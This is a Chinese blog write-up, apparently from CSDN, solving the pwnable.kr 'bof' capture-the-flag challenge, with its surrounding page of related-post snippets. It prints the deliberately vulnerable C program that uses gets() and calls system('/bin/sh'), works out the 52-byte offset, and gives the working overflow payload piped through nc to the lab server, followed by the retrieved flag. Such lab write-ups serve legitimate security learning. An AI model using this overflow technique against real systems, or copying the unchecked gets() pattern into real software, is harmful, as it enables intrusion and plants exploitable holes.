pwnable.kr bof

最新推荐文章于 2019-06-06 11:05:10 发布
最新推荐文章于 2019-06-06 11:05:10 发布
阅读量1.1k 收藏 1
点赞数 1
文章标签: pwnable.kr CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x1020915098/article/details/80917320
版权

pwnable.kr bof

image.png

同样的,既然有源代码。我们就配合着源代码来做题,这样可能更利于搞懂高级语言被反汇编之后两者之间的联系。

bof.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

这是关于数组溢出的问题,导致这个问题的原因是由于 gets() 函数没有检查接受字符串长度导致的。有的编译器在编译源代码的时候也会提示警告。其实这个题目也是相当的简单,如果你了解栈机制的话。

我们要做的就是让输入的字符串的后面四个字节覆盖 key。其实我们要做的就是算出 overflow 数组的首地址到 key 首地址之间的距离。

image.png

gets(overflow) 是接受输入,当然是从 overflow 的首地址开始存储字节。前面的 esp (esp在汇编中为栈顶指针,栈中数据都是从栈顶进去的,所以你懂的…)存放的就是 overflow 的基址,为 ebp + s 其中 s = byte ptr - 2ch。然后 key 的基址当然要在 cmd 里面找,因为 if (key == 0x….) 所以 ebp + arg_0, 就是 key 的基址,其中 arg_0 = dword ptr 8。然后很简单的算出两者的距离为 52。所以我们在输入 0xcafebabe 之前需要填充 52 个字符。

解题:

$ (python -c "print 'a'*52 + '\xbe\xba\xfe\xca'"; cat -) | nc pwnable.kr 9000
ls
bof
bof.c
flag
log
log2
super.pl
cat flag
daddy, I just pwned a buFFer :)

*Flag:***daddy, I just pwned a buFFer :)

其实用 gdb 调试也是一样的,由于时间和精力问题,这里不继续下去,感兴趣的自己去尝试。

孤的容颜早已不是年前丶
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bof.rar_BOF
09-21
MFC 按钮的小例子,初学者很适用,希望大家一起享用
pwnable.kr 简单题目详细笔记汇总
H4ppyD0g的博客
09-12 819
pwnable.kr fd pwnable.kr collision pwnable.kr bof pwnable.kr flag pwnable.kr passcode pwnable.kr random pwnable.kr input pwnable.kr leg pwnable.kr mistake pwnable.kr shellshock pwnable.kr coin1 pwnable.kr lotto pwnable.kr cmd1 pwnable.kr cmd2 pwnable.kr u
pwnable.kr】 ascii_easy
子曰小玖的博客
06-06 757
https://blog.yiz96.com/pwnable-ascii_easy/ 这道题首先给出了提示”ulimit”,这里是一个可以禁用ALSR的黑科技,当设置ulimit -s unlimted时,系统的ALSR将会失效,原因在于arch/x86/mm/mmap.c中: 1 2 3 4 5 6 7 8 9...
pwnable.kr ascii_easy writeup
charlie_heng的专栏
02-12 1698
兜兜转转,又回来这里刷题 这题讲真有点难度,虽然在实际比赛的时候比较少可能会出现这类题…….. 很明显可以用rop,但是rop链只能全部为ascii可见字符…..这就有点难度了 这题其实我想了好几种办法,但是实际用了只有一种,不过在这里也说下 利用rop链将ebx的值改为libc中got表的地址,然后跳转到one gadget 这个本来感觉是最快捷的办法,但是将gadget过滤掉一部分...
pwnable.kr之blackjack
river
05-17 2107
blackjack 这几天好忙,有点烦躁,这几天可能都没有什么时间刷题了。。。加油! 代码:http://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.html 拿到代码后,读代码….看题。 在代码中发现了这样一个函数,就是用户输入bet后,要判断一下,是不是大于500,如果大于500,就
pwnable.krbof
river
05-01 4386
bof   两种方法来做吧(就是入门为了练习,多接触一些。。。) 方法1:用ida直接看 算一下 输入的字符串s是ebp-2c 参数1 a1是ebp+8 距离是52,所以要覆盖52个字符。 但是这么简单的程序,抓住机会,小白练习一下gdb 方法2:用GDB调试,算参数地址 gdb bof
BoF.tar.gz_BOF_bag of features
09-19
Source Code for bag of features, developed in Matlab
bof_recognition.rar_BOF_filter bank
07-14
Filter bank representation methods for speech recognition
matlab.zip_BOF_炼钢_炼钢 matlab_转炉_转炉炼钢
09-21
matlab程序。转炉炼钢相关因素的优化,采用的方法是神经网络。
bof:betonfootball.eu
07-12
废话 betonfootball.eu
Pwnable
03-26
Pwnable
pwnable.krbof
leeham的博客
08-30 591
pwnable.krbof 这是一道缓冲区溢出的题目
pwnable.kr-----解题过程】bof
lyuchen65的博客
09-16 2397
#include #include #include void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); if(key == 0xcafebabe){ system("/bin/sh"); } else {
pwnable.kr --- bof题解
Yannie's Blog
12-11 989
题目如下: 我们将文件下载,打开 我们下载完题目中给的两个文件,然后打开bof.c文件,我们可以看到源码: #include &amp;amp;lt;stdio.h&amp;amp;gt; #include &amp;amp;lt;string.h&amp;amp;gt; #include &amp;amp;lt;stdlib.h&amp;amp;gt; void func(int key) { char overflowme[32]; printf(&
pwnable.kr-bof-Writeup
逐梦小涛
02-08 1319
MarkdownPad Document pwnable.kr-bof-Writeup 在http://pwnable.kr/bin/bof.c得到C代码如下: 1 #include 2 #include string.h> 3 #include 4 void func(int key){ 5 char overflowme[32]; 6 pri
pwnable.kr-bof
weixin_43464124的博客
11-20 513
第第第第第…三题了 首先看看题目: 按照题目要求,我们就先把bofbof.c下载下来看看吧(因为我还是习惯用Windows,而且我的ida也在Windows上,所以手动下载QAQ)。 打开看看: 不长的c程序,很简单的溢出。很明显直接按照他的方式key的值是无法system(&quot;/bin/sh&quot;)的,因此我们通过溢出覆盖掉这个key的值。但是我们只能通过输入overflow的值来溢出,所以我们看...
通过pwnable.kr从零学pwn
热门推荐
giantbranch的专栏
07-31 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的 挑战地址:http://pwnable.kr/play.php fd 首先不用说给了就直接连上去 看一下代码 重要函数:read ssize_t read(int fd,void *
pwnable.kr [bof]
shisuan1的博客
11-25 204
pwnable.kr [bof] Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running ...
pwnable.kr - fd
无节操
12-19 3607
题目: 题目链接:http://pwnable.kr/play.php ——> 连接登录:ssh fd@pwnable.kr -p2222查看文件及权限:ls -al看到flag文件,但是当前用户fd并没有读权限。 查看fd.ccat fd.c目标:执行system(“/bin/cat flag”); 则:strcmp(“LETMEWIN\n”, buf) == 0 则:buf =
expected bof record
最新发布
03-16
"expected bof record" 的意思是“预期的文件开头记录”,通常出现在打开 Excel 文件时出现错误的情况下。这个错误通常是由于文件格式不正确或文件已经损坏导致的。建议尝试使用其他方式打开文件或者尝试修复文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值